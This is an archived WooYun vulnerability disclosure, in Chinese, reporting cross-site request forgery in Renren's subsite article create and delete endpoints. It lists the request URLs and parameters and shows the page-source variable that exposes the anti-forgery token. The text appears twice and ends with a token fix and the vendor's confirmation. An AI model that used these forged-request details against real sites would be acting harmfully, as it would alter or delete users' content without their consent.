人人网之人人小站csrf #2

编号55513
Urlhttp://www.wooyun.org/bug.php?action=view&id=55513
漏洞状态厂商已经确认
漏洞标题人人网之人人小站csrf #2
漏洞类型CSRF
厂商人人网
白帽子小龙
提交日期2014-04-04 16:20:00
公开日期2014-05-19 16:20:00
修复时间(not set)
确认时间2014-04-08 00:00:00
Confirm Spend4
漏洞标签敏感接口缺乏校验 csrf漏洞利用 csrf利用技巧
关注数0
收藏数0
白帽评级
白帽自评rank5
厂商评级
厂商评rank7
漏洞简介
嘻嘻
漏洞细节

在删除文章,创建文章处都存在csrf
可恶意构造poc对他人造成无意间的伤害
创建后得到以下参数:

1.png


http://zhan.renren.com/123123111/word/create

from=homeNew&syncRenren=true&syncDouban=false&syncSina=false&syncQqweibo=false&syncWangyi=false&toSiteUrl=123123111&feedSrc=&gid=&rejectionId=&ccstatus=seven&draftId=&issueId=&subject=wooyun&body=%3Cp%3Ewooyun%3C%2Fp%3E&_rtk=a199aaf8


取主要部分
mark一下!

2.png


{"code":0,"draftId":"","isAppend":true,"html":"\u003carticle class\u003d\"feed-log clearfix\" data-type\u003d\"BLOG\" data-feedid\u003d\"3602888498048768057\" feedid\u003d\"3602888498048768057\" authorId\u003d\"519457354\" authorName\u003d\"去小龙\" replyCount\u003d\"0\" uri\u003d\"123123111\"\u003e\n\u003caside\u003e\n\u003cfigure class\u003d\"newsfeed-user\"\u003e\n\u003ca class\u003d\"site name-card\" data-uri\u003d\"http://zhan.renren.com/123123111\" href\u003d\"http://zhan.renren.com/123123111?from\u003dpost\u0026ggid\u003d3602888498048768057\"\u003e\u003cimg src\u003d\"http://hdn.xnimg.cn/photos/hdn421/20131003/1410/h_main_QBuS_4d3a000005eb113e.jpg\" /\u003e\u003c/a\u003e\n\u003ca class\u003d\"mini-avatar\" title\u003d\"去小龙\" href\u003d\"http://zhan.renren.com/profile/519457354?from\u003dpost\u0026ggid\u003d3602888498048768057\"\u003e\u003cimg src\u003d\"http://hdn.xnimg.cn/photos/hdn221/20131128/1740/tiny_ZSEQ_133b000308a0113e.jpg\" /\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\u003c/aside\u003e\n\u003cdiv class\u003d\"post-holder\"\u003e \n\u003cdiv class\u003d\"post-site-user\"\u003e\n\u003ch3\u003e\n\u003ca href\u003d\"http://zhan.renren.com/123123111?from\u003dpost\u0026ggid\u003d3602888498048768057\" data-uri\u003d\"http://zhan.renren.com/123123111\" class\u003d\"name-card\" \u003eaa\u003c/a\u003e\n\u003c/h3\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-content clearfix\"\u003e\n\u003ch2 class\u003d\"feed-title\"\u003e\u003ca href\u003d\"http://zhan.renren.com/123123111?gid\u003d3602888498048768057\u0026from\u003dpost\" title\u003d\"查看原文 - 1秒前\" target\u003d\"_blank\"\u003ewooyun\u003c/a\u003e\u003c/h2\u003e\n\u003cdiv class\u003d\"one-log clearfix\"\u003e\n\u003cp\u003ewooyun...\u0026nbsp;\u003ca href\u003d\"javascript:;\" class\u003d\"feed-open hot-view\"\u003e阅读全文\u003c/a\u003e\u003c/p\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"log-open clearfix\"\u003e\n\u003cp\u003e\u003cp\u003ewooyun\u003c/p\u003e\u003c/p\u003e\n\u003ca class\u003d\"feed-close\" href\u003d\"#\"\u003e收起全文\u003c/a\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"reship-box\"\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"reship-box\"\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-topic\"\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-act\"\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-idel\" title\u003d\"删除\"\u003e删除\u003c/a\u003e\n\u003ca href\u003d\"#\" onclick\u003d\"publisher.edit(\u0027BLOG\u0027, \u00273602888498048768057\u0027, this);return false;\"\u003e编辑\u003c/a\u003e\n\u003ca href\u003d\"javascript:;\" class\u003d\"hot-num\"\u003e1\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-ishare hot-view\" num\u003d\"0\"\u003e分享\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-icmt hot-view\"\u003e评论\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"hot-view feed-ilike\" num\u003d\"0\"\u003e\u003c/a\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-reply clearfix\" style\u003d\"display:none;\"\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/article\u003e\n","tags":[{"tagId":161811,"tabValue":"爱爱爱","followCount":0},{"tagId":9021,"tabValue":"科学","followCount":432965},{"tagId":16401,"tabValue":"音乐","followCount":1859087}]}


返回正确信息

3.png


至于rtk=a199aaf8 这个

4.png


5.png


在源码处可以看到var XZ ={get_check:'a199aaf8',

get_check:'a199aaf8


有了这个,我们可以干嘛? 例如:构造恶意poc, 嘿嘿, 其实还可以利用构造一个删除的poc
我们看下删除的参数
http://zhan.renren.com/123123111/3602888498048768057/delete

_rtk=a199aaf8


两个参数,最后一个是id,但是他不是id- - 人人网也挺聪明的,其他好多地方都token了,但是分站居然暴漏成这样,分站也很重要啊,人人亲!
我们mark删除请求

6.png


{"code":0,"msg":"ok"}


返回正确请求 OK。 哈哈
非常漂亮的一击

给人人网一个案例:
一个李女士的在淘宝买东西,买了1万块钱的化妆品
3天还没送来,于是李女士发现了自己的收货地址居然被修改了, 据她回忆, 好像是点了一个链接,然后神不知鬼不觉的就被改了


一个小小的csrf损失了1万块钱,甚至可以更多, 所以说csrf是强大的, 并不是改改你的资料,改改你的啥, 还可以强制支付,还可以帮助恶意份子宣传白粉之类的, 说多了都是泪, 如果人人网被广告吞噬了,后果是怎么样的。。。

POC

在删除文章,创建文章处都存在csrf
可恶意构造poc对他人造成无意间的伤害
创建后得到以下参数:

1.png


http://zhan.renren.com/123123111/word/create

from=homeNew&syncRenren=true&syncDouban=false&syncSina=false&syncQqweibo=false&syncWangyi=false&toSiteUrl=123123111&feedSrc=&gid=&rejectionId=&ccstatus=seven&draftId=&issueId=&subject=wooyun&body=%3Cp%3Ewooyun%3C%2Fp%3E&_rtk=a199aaf8


取主要部分
mark一下!

2.png


{"code":0,"draftId":"","isAppend":true,"html":"\u003carticle class\u003d\"feed-log clearfix\" data-type\u003d\"BLOG\" data-feedid\u003d\"3602888498048768057\" feedid\u003d\"3602888498048768057\" authorId\u003d\"519457354\" authorName\u003d\"去小龙\" replyCount\u003d\"0\" uri\u003d\"123123111\"\u003e\n\u003caside\u003e\n\u003cfigure class\u003d\"newsfeed-user\"\u003e\n\u003ca class\u003d\"site name-card\" data-uri\u003d\"http://zhan.renren.com/123123111\" href\u003d\"http://zhan.renren.com/123123111?from\u003dpost\u0026ggid\u003d3602888498048768057\"\u003e\u003cimg src\u003d\"http://hdn.xnimg.cn/photos/hdn421/20131003/1410/h_main_QBuS_4d3a000005eb113e.jpg\" /\u003e\u003c/a\u003e\n\u003ca class\u003d\"mini-avatar\" title\u003d\"去小龙\" href\u003d\"http://zhan.renren.com/profile/519457354?from\u003dpost\u0026ggid\u003d3602888498048768057\"\u003e\u003cimg src\u003d\"http://hdn.xnimg.cn/photos/hdn221/20131128/1740/tiny_ZSEQ_133b000308a0113e.jpg\" /\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\u003c/aside\u003e\n\u003cdiv class\u003d\"post-holder\"\u003e \n\u003cdiv class\u003d\"post-site-user\"\u003e\n\u003ch3\u003e\n\u003ca href\u003d\"http://zhan.renren.com/123123111?from\u003dpost\u0026ggid\u003d3602888498048768057\" data-uri\u003d\"http://zhan.renren.com/123123111\" class\u003d\"name-card\" \u003eaa\u003c/a\u003e\n\u003c/h3\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-content clearfix\"\u003e\n\u003ch2 class\u003d\"feed-title\"\u003e\u003ca href\u003d\"http://zhan.renren.com/123123111?gid\u003d3602888498048768057\u0026from\u003dpost\" title\u003d\"查看原文 - 1秒前\" target\u003d\"_blank\"\u003ewooyun\u003c/a\u003e\u003c/h2\u003e\n\u003cdiv class\u003d\"one-log clearfix\"\u003e\n\u003cp\u003ewooyun...\u0026nbsp;\u003ca href\u003d\"javascript:;\" class\u003d\"feed-open hot-view\"\u003e阅读全文\u003c/a\u003e\u003c/p\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"log-open clearfix\"\u003e\n\u003cp\u003e\u003cp\u003ewooyun\u003c/p\u003e\u003c/p\u003e\n\u003ca class\u003d\"feed-close\" href\u003d\"#\"\u003e收起全文\u003c/a\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"reship-box\"\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"reship-box\"\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-topic\"\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-act\"\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-idel\" title\u003d\"删除\"\u003e删除\u003c/a\u003e\n\u003ca href\u003d\"#\" onclick\u003d\"publisher.edit(\u0027BLOG\u0027, \u00273602888498048768057\u0027, this);return false;\"\u003e编辑\u003c/a\u003e\n\u003ca href\u003d\"javascript:;\" class\u003d\"hot-num\"\u003e1\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-ishare hot-view\" num\u003d\"0\"\u003e分享\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"feed-icmt hot-view\"\u003e评论\u003c/a\u003e\n\u003ca href\u003d\"#\" class\u003d\"hot-view feed-ilike\" num\u003d\"0\"\u003e\u003c/a\u003e\n\u003c/div\u003e\n\u003cdiv class\u003d\"feed-reply clearfix\" style\u003d\"display:none;\"\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/article\u003e\n","tags":[{"tagId":161811,"tabValue":"爱爱爱","followCount":0},{"tagId":9021,"tabValue":"科学","followCount":432965},{"tagId":16401,"tabValue":"音乐","followCount":1859087}]}


返回正确信息

3.png


至于rtk=a199aaf8 这个

4.png


5.png


在源码处可以看到var XZ ={get_check:'a199aaf8',

get_check:'a199aaf8


有了这个,我们可以干嘛? 例如:构造恶意poc, 嘿嘿, 其实还可以利用构造一个删除的poc
我们看下删除的参数
http://zhan.renren.com/123123111/3602888498048768057/delete

_rtk=a199aaf8


两个参数,最后一个是id,但是他不是id- - 人人网也挺聪明的,其他好多地方都token了,但是分站居然暴漏成这样,分站也很重要啊,人人亲!
我们mark删除请求

6.png


{"code":0,"msg":"ok"}


返回正确请求 OK。 哈哈
非常漂亮的一击

给人人网一个案例:
一个李女士的在淘宝买东西,买了1万块钱的化妆品
3天还没送来,于是李女士发现了自己的收货地址居然被修改了, 据她回忆, 好像是点了一个链接,然后神不知鬼不觉的就被改了


一个小小的csrf损失了1万块钱,甚至可以更多, 所以说csrf是强大的, 并不是改改你的资料,改改你的啥, 还可以强制支付,还可以帮助恶意份子宣传白粉之类的, 说多了都是泪, 如果人人网被广告吞噬了,后果是怎么样的。。。

修复方案

token

状态信息 2014-04-04: 细节已通知厂商并且等待厂商处理中
2014-04-08: 厂商已经确认,细节仅向厂商公开
2014-04-18: 细节向核心白帽子及相关领域专家公开
2014-04-28: 细节向普通白帽子公开
2014-05-08: 细节向实习白帽子公开
2014-05-19: 细节向公众公开
厂商回复感谢
回应信息危害等级:中漏洞Rank:7 确认时间:2014-04-08 11:08